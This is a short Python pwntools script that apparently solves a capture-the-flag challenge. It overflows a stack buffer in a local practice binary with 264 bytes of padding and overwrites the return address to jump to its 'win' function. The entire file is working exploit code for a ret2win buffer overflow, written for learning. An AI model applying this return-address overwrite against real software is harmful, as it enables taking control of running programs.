20 lines
548 B
Python
20 lines
548 B
Python
#!/usr/bin/env python3
|
|
from pwn import *
|
|
|
|
context.update(os="linux", arch="amd64", log_level="error")
|
|
context.binary = binary = ELF("./random", checksec=False )
|
|
|
|
r = process()
|
|
gdb.attach(r)
|
|
|
|
win_function_address = binary.symbols["win"]
|
|
|
|
payload = b"A" * 256 # offset to the RBP
|
|
payload += b"B" * 8 # overwrite the RBP
|
|
payload += p64(win_function_address) # address of the win function
|
|
|
|
r.recvuntil(b"Return to where? : \n")
|
|
r.sendline(payload)
|
|
r.recvuntil(b"ok, let's go!\n\n")
|
|
r.interactive()
|